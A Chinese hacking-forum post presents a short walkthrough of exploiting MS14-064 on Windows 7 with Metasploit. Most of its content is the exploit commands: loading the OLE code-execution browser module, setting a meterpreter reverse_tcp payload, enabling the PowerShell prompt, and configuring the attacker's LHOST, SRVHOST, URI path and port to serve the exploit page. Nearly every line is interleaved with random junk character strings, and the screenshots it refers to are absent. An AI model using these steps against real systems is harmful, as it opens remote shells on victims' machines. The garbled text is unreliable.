找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2035|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

4 H3 d* r" x0 G) C8 g 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示6 \- m5 _& c2 F2 o7 M& c" U- ] ~

1 @" W. m) D. f& l: A. O6 ]

. K# i; i$ P6 [7 E! J 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ) n5 a0 E: N- H( s

5 \% w. P* G4 M

# d+ `4 P3 y) ?" ]6 U" t! d 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp+ o9 b3 {$ O4 Q

+ A: t, ?4 A9 b. y" A" M8 d' F

# P' @8 P+ ^9 b) E0 Z9 s             set AllowPowershellPrompt true' N! r7 p0 }& N" o9 x4 f" C4 H6 [

: p; f$ C2 ?" u0 S8 ~: i1 l& k" }

7 Z j1 F& }( M9 {             Set LHOST 192.168.0.1094 O! _- e% l0 p

; E' P2 L! L! ^ I# I( v2 a# w

5 \! Y# C& N0 P# f( a             set SRVHOST 192.168.0.109 R0 N; R& H& }1 \" S! {. ^0 Q

$ G; l2 e- B9 {6 N

2 N# j% x* H% E& a) @, p9 b5 x             Set uripath share , J( Z; U' K0 c$ p9 t2 P

; C( F$ A- b; u4 U( w# ^

4 I0 S: @: \& A9 H' T0 \# r; p             Set srvport 80 9 D- J6 o7 _; G9 ?4 Q$ m2 c, E) D

0 i+ K/ A% c* J. @$ T; D4 X) S; k

4 K. O5 g+ c ]* h4 m! U/ I) l7 F   ; N! G$ V1 C$ A( W7 K' G6 d

1 k2 _( e! n8 Y; a! M1 X( m' ]

2 }0 e8 W. j) r5 x u6 o   + I/ l- i n* ?) O

4 c4 S( v" V9 Y+ I o' T# e, |

- ^8 w9 }0 R9 A- d  9 B2 V6 z: N) i. Q$ a, H, U( \

5 s5 Z$ y+ X' f, Y9 r% Y. B

$ |" v4 |% u: Y  : @" b# N: Z) a Z9 E+ m

6 A9 z# g! H$ A& e& ~6 @) U8 R

8 |; ? g- @2 K( `% e  2 y" H! o, R% ~, c

4 o" @- j3 _7 I9 X" P

# w+ i1 {& S1 u$ w8 `7 L, L5 } 下面我们来访问本地地址如图: , {( `# E6 b- s* b1 P5 w. y

+ J) Y8 i: @' n; O3 s: H

5 Z- }- g5 `+ ^+ D0 f2 e0 @- `   . e/ \$ U4 {: w3 Z* l) @, p

; e+ }( O$ f3 ]$ s3 i

9 U# w" B) {, c( f  2 m6 F6 ]$ E: m9 }6 r$ `

4 [/ G# X5 Q) X1 h1 r3 }

- C1 \2 ?! s6 Y K, Q* `8 B 3 ~. T) q, h8 Z4 a% B5 T

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表